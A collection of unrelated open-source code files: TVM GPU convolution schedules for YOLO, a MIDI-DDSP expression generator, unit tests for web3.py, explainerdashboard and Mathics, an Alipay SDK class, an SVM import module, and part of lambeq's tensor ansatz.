# s[read_local_inputs].compute_at(s[write_cache], rxi)
# cooperative fetching
for cache in [read_share_inputs, read_share_weight]:
cb, ck, ch, cw = s[cache].op.axis
fused = s[cache].fuse(cb, ck, ch, cw)
fused, bindx = s[cache].split(fused, factor=q_factors[2])
fused, bindy = s[cache].split(fused, factor=p_factors[2])
fused, bindz = s[cache].split(fused, factor=b_factors[2] * k_factors[2])
s[cache].bind(bindx, tx)
s[cache].bind(bindy, ty)
s[cache].bind(bindz, tz)
s[outputs].pragma(kernel_scope, 'auto_unroll_max_step', 1500)
s[outputs].pragma(kernel_scope, 'unroll_explicit', 1)
s[padded].compute_inline()
def schedule_yolo_conv_cuda_2(s, outputs, inputs, weight, parameter):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# create cache
write_cache = s.cache_write(outputs, "local")
read_share_weight = s.cache_read(weight, "shared", [write_cache])
# read_local_weight = s.cache_read(read_share_weight, "local", [write_cache])
read_share_inputs = s.cache_read(padded, "shared", [write_cache])
# read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache])
b_factors = parameter.b_factors
k_factors = parameter.k_factors
p_factors = parameter.p_factors
q_factors = parameter.q_factors
rc_factors = parameter.rc_factors
ry_factors = parameter.ry_factors
rx_factors = parameter.rx_factors
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
vx = tvm.te.thread_axis("vthread")
vy = tvm.te.thread_axis("vthread")
vz = tvm.te.thread_axis("vthread")
tx = tvm.te.thread_axis("threadIdx.x")
ty = tvm.te.thread_axis("threadIdx.y")
tz = tvm.te.thread_axis("threadIdx.z")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
kernel_scope, b = s[outputs].split(b, nparts=1)
ko, ki = s[outputs].split(k, nparts=k_factors[0])
po, pi = s[outputs].split(p, nparts=p_factors[0])
qo, qi = s[outputs].split(q, nparts=q_factors[0])
vko, ki = s[outputs].split(ki, nparts=k_factors[1])
vpo, pi = s[outputs].split(pi, nparts=p_factors[1])
vqo, qi = s[outputs].split(qi, nparts=q_factors[1])
tko, ki = s[outputs].split(ki, nparts=k_factors[2])
tpo, pi = s[outputs].split(pi, nparts=p_factors[2])
tqo, qi = s[outputs].split(qi, nparts=q_factors[2])
# reorder
s[outputs].reorder(ko, po, qo, vko, vpo, vqo, tko, tpo, tqo, ki, pi, qi)
# s[outputs].reorder(po, bko, qo, vqo, vbko, vpo, tbko, tpo, tqo, bki, pi, qi)
# fuse
bko = s[outputs].fuse(b, ko)
# bind
s[outputs].bind(bko, bz)
s[outputs].bind(po, by)
s[outputs].bind(qo, bx)
s[outputs].bind(vko, vz)
s[outputs].bind(vpo, vy)
s[outputs].bind(vqo, vx)
s[outputs].bind(tko, tz)
s[outputs].bind(tpo, ty)
s[outputs].bind(tqo, tx)
# compute at write cache
s[write_cache].compute_at(s[outputs], tqo)
rc, ry, rx = s[write_cache].op.reduce_axis
rco, rci = s[write_cache].split(rc, nparts=rc_factors[0])
rcm, rci = s[write_cache].split(rci, nparts=rc_factors[1])
ryo, ryi = s[write_cache].split(ry, nparts=ry_factors[0])
rym, ryi = s[write_cache].split(ryi, nparts=ry_factors[1])
rxo, rxi = s[write_cache].split(rx, nparts=rx_factors[0])
rxm, rxi = s[write_cache].split(rxi, nparts=rx_factors[1])
a, b, c, d = s[write_cache].op.axis
s[write_cache].reorder(rco, ryo, rxo, rcm, rym, rxm, rci, ryi, rxi, a, b, c, d)
# compute at read cache
s[read_share_weight].compute_at(s[write_cache], rxm)
# s[read_local_weight].compute_at(s[write_cache], rxi)
s[read_share_inputs].compute_at(s[write_cache], rxm)
# s[read_local_inputs].compute_at(s[write_cache], rxi)
# cooperative fetching
for cache in [read_share_inputs, read_share_weight]:
cb, ck, ch, cw = s[cache].op.axis
fused = s[cache].fuse(cb, ck, ch, cw)
fused, bindx = s[cache].split(fused, factor=q_factors[2])
fused, bindy = s[cache].split(fused, factor=p_factors[2])
fused, bindz = s[cache].split(fused, factor=k_factors[2])
s[cache].bind(bindx, tx)
s[cache].bind(bindy, ty)
s[cache].bind(bindz, tz)
s[outputs].pragma(kernel_scope, 'auto_unroll_max_step', 1500)
s[outputs].pragma(kernel_scope, 'unroll_explicit', 1)
s[padded].compute_inline()
def schedule_yolo_conv_cuda_3(s, outputs, inputs, weight, parameter):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# create cache
write_cache = s.cache_write(outputs, "local")
read_share_weight = s.cache_read(weight, "shared", [write_cache])
# read_local_weight = s.cache_read(read_share_weight, "local", [write_cache])
read_share_inputs = s.cache_read(padded, "shared", [write_cache])
# read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache])
b_factors = parameter.b_factors
k_factors = parameter.k_factors
p_factors = parameter.p_factors
q_factors = parameter.q_factors
rc_factors = parameter.rc_factors
ry_factors = parameter.ry_factors
rx_factors = parameter.rx_factors
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
vx = tvm.te.thread_axis("vthread")
vy = tvm.te.thread_axis("vthread")
vz = tvm.te.thread_axis("vthread")
tx = tvm.te.thread_axis("threadIdx.x")
ty = tvm.te.thread_axis("threadIdx.y")
tz = tvm.te.thread_axis("threadIdx.z")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
kernel_scope, b = s[outputs].split(b, nparts=1)
bo, bi = s[outputs].split(b, nparts=b_factors[0])
ko, ki = s[outputs].split(k, nparts=k_factors[0])
po, pi = s[outputs].split(p, nparts=p_factors[0])
qo, qi = s[outputs].split(q, nparts=q_factors[0])
vbo, bi = s[outputs].split(bi, nparts=b_factors[1])
vko, ki = s[outputs].split(ki, nparts=k_factors[1])
vpo, pi = s[outputs].split(pi, nparts=p_factors[1])
vqo, qi = s[outputs].split(qi, nparts=q_factors[1])
tbo, bi = s[outputs].split(bi, nparts=b_factors[2])
tko, ki = s[outputs].split(ki, nparts=k_factors[2])
tpo, pi = s[outputs].split(pi, nparts=p_factors[2])
tqo, qi = s[outputs].split(qi, nparts=q_factors[2])
# reorder
s[outputs].reorder(bo, ko, po, qo, vbo, vko, vpo, vqo, tbo, tko, tpo, tqo, bi, ki, pi, qi)
# fuse
outer = s[outputs].fuse(bo, ko, po, qo)
middle = s[outputs].fuse(vbo, vko, vpo, vqo)
inner = s[outputs].fuse(tbo, tko, tpo, tqo)
# bind
s[outputs].bind(outer, bx)
s[outputs].bind(inner, tx)
# compute at write cache
s[write_cache].compute_at(s[outputs], inner)
rc, ry, rx = s[write_cache].op.reduce_axis
rco, rci = s[write_cache].split(rc, nparts=rc_factors[0])
rcm, rci = s[write_cache].split(rci, nparts=rc_factors[1])
ryo, ryi = s[write_cache].split(ry, nparts=ry_factors[0])
rym, ryi = s[write_cache].split(ryi, nparts=ry_factors[1])
rxo, rxi = s[write_cache].split(rx, nparts=rx_factors[0])
rxm, rxi = s[write_cache].split(rxi, nparts=rx_factors[1])
a, b, c, d = s[write_cache].op.axis
s[write_cache].reorder(rco, ryo, rxo, rcm, rym, rxm, rci, ryi, rxi, a, b, c, d)
# compute at read cache
s[read_share_weight].compute_at(s[write_cache], rxm)
# s[read_local_weight].compute_at(s[write_cache], rxi)
s[read_share_inputs].compute_at(s[write_cache], rxm)
# s[read_local_inputs].compute_at(s[write_cache], rxi)
# cooperative fetching
for cache in [read_share_inputs, read_share_weight]:
cb, ck, ch, cw = s[cache].op.axis
fused = s[cache].fuse(cb, ck, ch, cw)
fused, bindx = s[cache].split(fused, factor=b_factors[2] * k_factors[2] * p_factors[2] * q_factors[2])
s[cache].bind(bindx, tx)
s[outputs].pragma(kernel_scope, 'auto_unroll_max_step', 1500)
s[outputs].pragma(kernel_scope, 'unroll_explicit', 1)
s[padded].compute_inline()
def schedule_yolo_conv_opencl(s, outputs, inputs, weight):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
bo, bi = s[outputs].split(b, nparts=1)
s[outputs].bind(bo, bx)
s[padded].compute_inline()
def try_yolo_conv(config, parameter, fsch):
# get the compute
# (1, 3, 448, 448, 64, 3, 7, 7, 1, 2, 3, 1, 1)
batch, CI, H, W, CO, _, kh, kw, _, st, pad, dilation, group = config
inputs = tvm.te.placeholder((batch, CI, H, W), dtype="float32")
weight = tvm.te.placeholder((CO, CI, kh, kw), dtype="float32")
outputs = conv2d_nchw(inputs, weight, stride=st, padding=pad, dilation=dilation, groups=group)
s = tvm.te.create_schedule(outputs.op)
fsch(s, outputs, inputs, weight, parameter)
arg_bufs = [inputs, weight, outputs]
stmt = tvm.lower(s, arg_bufs, simple_mode=True)
# print(stmt)
dev_id = 2
ctx = tvm.nd.context("cuda", dev_id)
max_dims = ctx.max_thread_dimensions
kwargs = {
"max_shared_memory_per_block": ctx.max_shared_memory_per_block,
"max_threads_per_block": ctx.max_threads_per_block,
"max_thread_x": max_dims[0],
"max_thread_y": max_dims[1],
"max_thread_z": max_dims[2]
}
verify = tvm.tir.ir_pass.VerifyGPUCode(stmt, kwargs)
# print("config is:\n %s" % (str(config)))
if verify:
print("Valid kernel")
time_cost = _evaluate(s, arg_bufs, "cuda", dev_id, 10)
print("Yolo conv use", time_cost, "ms\n")
else:
print("Invalid kernel")
time_cost = float("inf")
return time_cost
if __name__ == "__main__":
res = []
parameters = []
with open("yolo_conv_b8_parameters.txt", "r") as fin:
for line in fin:
_, content = line.split(":", 1)
obj = json.loads(content)
op_parameters = obj[0]
conv_parameters = op_parameters[1]
parameter = Parameter()
parameter.b_factors = conv_parameters["spatial"][0]
parameter.k_factors = conv_parameters["spatial"][1]
parameter.p_factors = conv_parameters["spatial"][2]
parameter.q_factors = conv_parameters["spatial"][3]
parameter.rc_factors = conv_parameters["reduce"][0]
parameter.ry_factors = conv_parameters["reduce"][1]
parameter.rx_factors = conv_parameters["reduce"][2]
parameters.append(parameter)
for config, parameter in list(zip(yolo_shapes_b8, parameters))[:]:
cost = try_yolo_conv(config, parameter, schedule_yolo_conv_cuda_3)
res.append(cost)
for ele in res:
print(ele)
|
midi_ddsp/modules/expression_generator.py | magenta/midi-ddsp | 169 | 12688633 | # Copyright 2022 The MIDI-DDSP Authors.
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Expression generator module class."""
from abc import ABC
import tensorflow as tf
from ddsp.training import nn
from midi_ddsp.data_handling.instrument_name_utils import NUM_INST
from midi_ddsp.modules.cond_rnn import TwoLayerCondAutoregRNN
tfk = tf.keras
tfkl = tfk.layers
class LangModelOutputLayer(tfkl.Layer):
def __init__(self, n_out, nhid=256):
super().__init__()
self.n_out = n_out
self.dense_out = nn.FcStackOut(ch=nhid, layers=2, n_out=self.n_out)
def call(self, inputs):
outputs = self.dense_out(inputs)
outputs = {'raw_output': outputs}
return outputs
class ExpressionGenerator(TwoLayerCondAutoregRNN, tf.keras.Model, ABC):
"""Expression Generator that takes note sequence as input and predicts
note expression controls."""
# TODO:(yusongwu) merge teacher_force and autoregressive function,
# things need to change:
# def sample_out(self, out, cond, time, training=False):
# curr_out = self.sample_out(curr_out, cond, i, training=training)
# output = self.split_teacher_force_output(output, cond)
def __init__(self, n_out=6, nhid=128, norm=True, dropout=0.5):
super().__init__(
nhid=nhid,
n_out=n_out,
input_dropout=True,
input_dropout_p=0.5,
dropout=dropout,
)
self.birnn = tfkl.Bidirectional(tfkl.GRU(
units=nhid, return_sequences=True, dropout=dropout
), )
self.dense_out = LangModelOutputLayer(nhid=nhid, n_out=self.n_out)
self.norm = nn.Normalize('layer') if norm else None
self.pitch_emb = tfkl.Embedding(128, 64)
self.duration_emb = tfkl.Dense(64)
self.instrument_emb = tfkl.Embedding(NUM_INST, 64)
def autoregressive(self, cond, training=False):
note_pitch = cond['note_pitch'][..., tf.newaxis]
cond = self.encode_cond(cond, training=training)
batch_size = cond.shape[0]
length = cond.shape[1]
prev_out = tf.tile([[0.0]], [batch_size, self.n_out])[:, tf.newaxis,
:] # go_frame
prev_states = (None, None)
overall_outputs = []
for i in range(length):
curr_cond = cond[:, i, :][:, tf.newaxis, :]
prev_out = self.encode_out(prev_out)
curr_out, curr_states = self._one_step(curr_cond, prev_out, prev_states,
training=training)
curr_out = self.sample_out(curr_out,
note_pitch[:, i, :][:, tf.newaxis, :])
overall_outputs.append(curr_out)
prev_out, prev_states = curr_out['output'], curr_states
outputs = {}
for k in curr_out.keys():
outputs[k] = tf.concat([x[k] for x in overall_outputs], 1)
return outputs
def teacher_force(self, cond, out, training=True):
note_pitch = cond['note_pitch'][..., tf.newaxis]
out_shifted = self.right_shift_encode_out(out)
cond = self.encode_cond(cond, training=training)
z_in = tf.concat([cond, out_shifted], -1)
z_out, *states = self.rnn1(z_in, training=training)
z_out, *states = self.rnn2(z_out, training=training)
output = self.decode_out(z_out)
output = self.sample_out(output, note_pitch)
return output
def encode_cond(self, cond, training=False):
z_pitch = self.pitch_emb(cond['note_pitch'])
z_duration = self.duration_emb(cond['note_length'])
z_instrument = self.instrument_emb(
tf.tile(cond['instrument_id'][:, tf.newaxis], [1, z_pitch.shape[1]]))
cond = tf.concat([z_pitch, z_duration, z_instrument], -1)
cond = self.birnn(cond, training=training)
return cond
def decode_out(self, z_out):
if self.norm is not None:
z_out = self.norm(z_out)
output = self.dense_out(z_out)
return output
def sample_out(self, out, note_pitch):
output = out.copy()
sampled_output = out['raw_output']
rest_note_mask = tf.cast(note_pitch != 0, tf.float32)
sampled_output *= rest_note_mask
output['output'] = sampled_output
return output
def call(self, cond, out=None, training=False):
if training:
outputs = self.teacher_force(cond, out, training=training)
else:
outputs = self.autoregressive(cond, training=training)
return outputs
def get_fake_data_expression_generator(target_dim):
instrument_id = tf.ones([1], dtype=tf.int64)
cond = {
'note_pitch': tf.ones([1, 32], dtype=tf.int64),
'note_length': tf.ones([1, 32, 1], dtype=tf.float32),
'instrument_id': instrument_id
}
target = tf.ones([1, 32, target_dim], dtype=tf.float32)
fake_data = {
'cond': cond,
'target': target
}
return fake_data
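# Hedged usage sketch (not part of the original file): the fake-data helper above
# is shaped so a forward pass can be smoke-tested roughly like this; passing `out`
# by keyword and the chosen n_out are assumptions, not the project's own recipe.
#   model = ExpressionGenerator(n_out=6)
#   fake = get_fake_data_expression_generator(target_dim=6)
#   teacher_forced = model(fake['cond'], out=fake['target'], training=True)
#   sampled = model(fake['cond'], training=False)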
|
tests/core/middleware/test_gas_price_strategy.py | geofferyj/web3.py | 3,041 | 12688643 | import pytest
from unittest.mock import (
Mock,
)
from web3.middleware import (
gas_price_strategy_middleware,
)
@pytest.fixture
def the_gas_price_strategy_middleware(web3):
make_request, web3 = Mock(), Mock()
initialized = gas_price_strategy_middleware(make_request, web3)
initialized.web3 = web3
initialized.make_request = make_request
return initialized
def test_gas_price_generated(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value = 5
method = 'eth_sendTransaction'
params = ({
'to': '0x0',
'value': 1,
},)
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.assert_called_once_with({
'to': '0x0',
'value': 1,
})
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, ({
'to': '0x0',
'value': 1,
'gasPrice': '0x5',
},))
def test_gas_price_not_overridden(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value = 5
method = 'eth_sendTransaction'
params = ({
'to': '0x0',
'value': 1,
'gasPrice': 10,
},)
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, ({
'to': '0x0',
'value': 1,
'gasPrice': 10,
},))
def test_gas_price_not_set_without_gas_price_strategy(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.eth.generate_gas_price.return_value = None
method = 'eth_sendTransaction'
params = ({
'to': '0x0',
'value': 1,
},)
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, params)
def test_not_generate_gas_price_when_not_send_transaction_rpc(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.web3.getGasPriceStrategy = Mock()
the_gas_price_strategy_middleware('eth_getBalance', [])
the_gas_price_strategy_middleware.web3.getGasPriceStrategy.assert_not_called()
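# Hedged usage sketch (not part of the original tests): outside of these mocks the
# middleware reads whatever strategy was registered on the Web3 instance, e.g.
#   from web3.gas_strategies.rpc import rpc_gas_price_strategy
#   w3.eth.set_gas_price_strategy(rpc_gas_price_strategy)
#   w3.eth.send_transaction({'to': '0x0', 'value': 1})  # gasPrice filled by strategy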
|
tests/test_linear_model.py | hugocool/explainerdashboard | 1,178 | 12688658 | import unittest
import pandas as pd
import numpy as np
import shap
import plotly.graph_objects as go
from sklearn.linear_model import LinearRegression, LogisticRegression
from explainerdashboard.explainers import RegressionExplainer, ClassifierExplainer
from explainerdashboard.datasets import titanic_fare, titanic_survive, titanic_names
class LinearRegressionTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_fare()
self.test_len = len(X_test)
train_names, test_names = titanic_names()
_, self.names = titanic_names()
model = LinearRegression()
model.fit(X_train, y_train)
self.explainer = RegressionExplainer(model, X_test, y_test,
shap='linear',
cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']},
'Deck', 'Embarked'],
idxs=test_names, units="$")
def test_explainer_len(self):
self.assertEqual(len(self.explainer), self.test_len)
def test_int_idx(self):
self.assertEqual(self.explainer.get_idx(self.names[0]), 0)
def test_random_index(self):
self.assertIsInstance(self.explainer.random_index(), int)
self.assertIsInstance(self.explainer.random_index(return_str=True), str)
def test_preds(self):
self.assertIsInstance(self.explainer.preds, np.ndarray)
def test_pred_percentiles(self):
self.assertIsInstance(self.explainer.pred_percentiles(), np.ndarray)
def test_permutation_importances(self):
self.assertIsInstance(self.explainer.get_permutation_importances_df(), pd.DataFrame)
def test_metrics(self):
self.assertIsInstance(self.explainer.metrics(), dict)
self.assertIsInstance(self.explainer.metrics_descriptions(), dict)
def test_mean_abs_shap_df(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_top_interactions(self):
self.assertIsInstance(self.explainer.top_shap_interactions("Age"), list)
self.assertIsInstance(self.explainer.top_shap_interactions("Age", topx=4), list)
def test_contrib_df(self):
self.assertIsInstance(self.explainer.get_contrib_df(0), pd.DataFrame)
self.assertIsInstance(self.explainer.get_contrib_df(0, topx=3), pd.DataFrame)
def test_shap_base_value(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
def test_shap_values_shape(self):
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
def test_shap_values(self):
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
def test_mean_abs_shap(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_calculate_properties(self):
self.explainer.calculate_properties(include_interactions=False)
def test_pdp_df(self):
self.assertIsInstance(self.explainer.pdp_df("Age"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Gender"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Deck"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Age", index=0), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Gender", index=0), pd.DataFrame)
class LogisticRegressionTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_survive()
train_names, test_names = titanic_names()
model = LogisticRegression()
model.fit(X_train, y_train)
self.explainer = ClassifierExplainer(
model, X_test, y_test,
shap='linear',
cats=['Sex', 'Deck', 'Embarked'],
labels=['Not survived', 'Survived'],
idxs=test_names)
def test_preds(self):
self.assertIsInstance(self.explainer.preds, np.ndarray)
def test_pred_percentiles(self):
self.assertIsInstance(self.explainer.pred_percentiles(), np.ndarray)
def test_columns_ranked_by_shap(self):
self.assertIsInstance(self.explainer.columns_ranked_by_shap(), list)
def test_permutation_importances(self):
self.assertIsInstance(self.explainer.get_permutation_importances_df(), pd.DataFrame)
def test_metrics(self):
self.assertIsInstance(self.explainer.metrics(), dict)
self.assertIsInstance(self.explainer.metrics_descriptions(), dict)
def test_mean_abs_shap_df(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_contrib_df(self):
self.assertIsInstance(self.explainer.get_contrib_df(0), pd.DataFrame)
self.assertIsInstance(self.explainer.get_contrib_df(0, topx=3), pd.DataFrame)
def test_shap_base_value(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
def test_shap_values_shape(self):
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
def test_shap_values(self):
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
def test_mean_abs_shap(self):
self.assertIsInstance(self.explainer.get_mean_abs_shap_df(), pd.DataFrame)
def test_calculate_properties(self):
self.explainer.calculate_properties(include_interactions=False)
def test_pdp_df(self):
self.assertIsInstance(self.explainer.pdp_df("Age"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Sex"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Deck"), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Age", index=0), pd.DataFrame)
self.assertIsInstance(self.explainer.pdp_df("Sex", index=0), pd.DataFrame)
def test_pos_label(self):
self.explainer.pos_label = 1
self.explainer.pos_label = "Not survived"
self.assertIsInstance(self.explainer.pos_label, int)
self.assertIsInstance(self.explainer.pos_label_str, str)
self.assertEqual(self.explainer.pos_label, 0)
self.assertEqual(self.explainer.pos_label_str, "Not survived")
def test_pred_probas(self):
self.assertIsInstance(self.explainer.pred_probas(), np.ndarray)
def test_metrics(self):
self.assertIsInstance(self.explainer.metrics(), dict)
self.assertIsInstance(self.explainer.metrics(cutoff=0.9), dict)
def test_precision_df(self):
self.assertIsInstance(self.explainer.get_precision_df(), pd.DataFrame)
self.assertIsInstance(self.explainer.get_precision_df(multiclass=True), pd.DataFrame)
self.assertIsInstance(self.explainer.get_precision_df(quantiles=4), pd.DataFrame)
def test_lift_curve_df(self):
self.assertIsInstance(self.explainer.get_liftcurve_df(), pd.DataFrame)
class LogisticRegressionKernelTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_survive()
train_names, test_names = titanic_names()
model = LogisticRegression()
model.fit(X_train, y_train)
self.explainer = ClassifierExplainer(
model, X_test.iloc[:20], y_test.iloc[:20],
shap='kernel', model_output='probability',
X_background=shap.sample(X_train, 5),
cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']},
'Deck', 'Embarked'],
labels=['Not survived', 'Survived'])
def test_shap_values(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
class LinearRegressionKernelTests(unittest.TestCase):
def setUp(self):
X_train, y_train, X_test, y_test = titanic_fare()
self.test_len = len(X_test)
model = LinearRegression().fit(X_train, y_train)
self.explainer = RegressionExplainer(model, X_test.iloc[:20], y_test.iloc[:20], shap='kernel',
X_background=shap.sample(X_train, 5))
def test_shap_values(self):
self.assertIsInstance(self.explainer.shap_base_value(), (np.floating, float))
self.assertTrue(self.explainer.get_shap_values_df().shape == (len(self.explainer), len(self.explainer.merged_cols)))
self.assertIsInstance(self.explainer.get_shap_values_df(), pd.DataFrame)
|
test/test_formatter/test_asy.py | skirpichev/Mathics | 1,920 | 12688662 | import re
from mathics.core.expression import Symbol, Integer0, Integer1, Expression
from mathics.core.evaluation import Evaluation
from mathics.session import MathicsSession
from mathics.builtin.inout import MakeBoxes
session = MathicsSession(add_builtin=True, catch_interrupt=False)
evaluation = Evaluation(session.definitions)
GraphicsSymbol = Symbol("Graphics")
ListSymbol = Symbol("List")
asy_wrapper_pat = r"""^\s*
\s*\\begin{asy}
\s*usepackage\("amsmath"\);
\s*size\(.+\);
\s*
"""
def extract_asy_body(asy):
matches = re.match(asy_wrapper_pat, asy)
body = asy[len(matches.group(0)) :]
assert matches
print(body)
return body
def get_asy(expression):
boxes = MakeBoxes(expression).evaluate(evaluation)
return boxes.boxes_to_tex()
def test_asy_circle():
expression = Expression(
GraphicsSymbol,
Expression("Circle", Expression(ListSymbol, Integer0, Integer0)),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
# Circles are implemented as ellipses with equal major and minor axes.
# Check for that.
matches = re.match(r"^draw\(ellipse\(\((.+),\s*(.+)\),(.*),(.*)\), .*", inner_asy)
assert matches
# Check that center point is centered and
# major and minor axes are the same
assert matches.group(1) == matches.group(2)
assert matches.group(3) == matches.group(4)
def test_asy_point():
expression = Expression(
GraphicsSymbol,
Expression("Point", Expression(ListSymbol, Integer0, Integer0)),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
print(inner_asy)
# matches = re.match(r'^Circle\((.+), (.+), (.+)\),.+;', inner_asy)
matches = re.match(r"// PointBox\ndot\(\((.+), (.+)\), .+\);.*", inner_asy)
assert matches
# Since the x,y point is the same, we'll check that whatever this
# coordinate mapped to, it is the same.
assert matches.group(1) == matches.group(2)
def test_asy_arrowbox():
expression = Expression(
GraphicsSymbol,
Expression(
"Arrow",
Expression(
ListSymbol,
Expression(ListSymbol, Integer0, Integer0),
Expression(ListSymbol, Integer1, Integer1),
),
),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
matches = re.match(r"^draw\(.*\)", inner_asy)
# TODO: Match line and arrowbox
assert matches
def test_asy_bezier_curve():
expression = Expression(
GraphicsSymbol,
Expression(
"BezierCurve",
Expression(
ListSymbol,
Expression(ListSymbol, Integer0, Integer0),
Expression(ListSymbol, Integer1, Integer1),
),
),
)
asy = get_asy(expression)
inner_asy = extract_asy_body(asy)
matches = re.match(r"// BezierCurveBox\nimport graph;", inner_asy)
# TODO: Match line and arrowbox
assert matches
if __name__ == "__main__":
test_asy_bezier_curve()
|
alipay/aop/api/domain/AlipayInsDataDsbRequestImageInfo.py | snowxmas/alipay-sdk-python-all | 213 | 12688667 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsDataDsbRequestImageInfo(object):
def __init__(self):
self._image_name = None
self._image_path = None
@property
def image_name(self):
return self._image_name
@image_name.setter
def image_name(self, value):
self._image_name = value
@property
def image_path(self):
return self._image_path
@image_path.setter
def image_path(self, value):
self._image_path = value
def to_alipay_dict(self):
params = dict()
if self.image_name:
if hasattr(self.image_name, 'to_alipay_dict'):
params['image_name'] = self.image_name.to_alipay_dict()
else:
params['image_name'] = self.image_name
if self.image_path:
if hasattr(self.image_path, 'to_alipay_dict'):
params['image_path'] = self.image_path.to_alipay_dict()
else:
params['image_path'] = self.image_path
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsDataDsbRequestImageInfo()
if 'image_name' in d:
o.image_name = d['image_name']
if 'image_path' in d:
o.image_path = d['image_path']
return o
|
pattern/vector/svm/__init__.py | huihui7987/pattern | 6,201 | 12688681 |
from __future__ import absolute_import
from __future__ import division
LIBSVM = LIBLINEAR = True
try:
from . import libsvm
from . import libsvmutil
except ImportError as e:
LIBSVM = False
raise e
try:
from . import liblinear
from . import liblinearutil
except:
LIBLINEAR = False
|
lambeq/ansatz/tensor.py | CQCL/lambeq | 131 | 12688695 | # Copyright 2021, 2022 Cambridge Quantum Computing Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tensor Ansatz
=============
A tensor ansatz is used to convert a DisCoCat diagram into a tensor network.
"""
from __future__ import annotations
__all__ = ['TensorAnsatz', 'MPSAnsatz', 'SpiderAnsatz']
from collections.abc import Mapping
from functools import reduce
from typing import Any
from discopy import rigid, Ty, tensor, Word
from discopy.rigid import Cup, Spider
from discopy.tensor import Dim
from lambeq.ansatz import BaseAnsatz, Symbol
class TensorAnsatz(BaseAnsatz):
"""Base class for tensor network ansatz."""
def __init__(self, ob_map: Mapping[Ty, Dim], **kwargs: Any) -> None:
"""Instantiate a tensor network ansatz.
Parameters
----------
ob_map : dict
A mapping from :py:class:`discopy.rigid.Ty` to the dimension
space it uses in a tensor network.
**kwargs : dict
Extra parameters for ansatz configuration.
"""
self.ob_map = ob_map
self.functor = rigid.Functor(
ob=self._ob,
ar=self._ar, ar_factory=tensor.Diagram, ob_factory=tensor.Dim)
def _ob(self, type_: Ty) -> Dim:
return Dim().tensor(*[self.ob_map[Ty(t.name)] for t in type_])
def _ar(self, box: rigid.Box) -> tensor.Diagram:
name = self._summarise_box(box)
dom = self._ob(box.dom)
cod = self._ob(box.cod)
n_params = reduce(lambda x, y: x * y, dom @ cod, 1)
syms = Symbol(name, size=n_params)
return tensor.Box(box.name, dom, cod, syms)
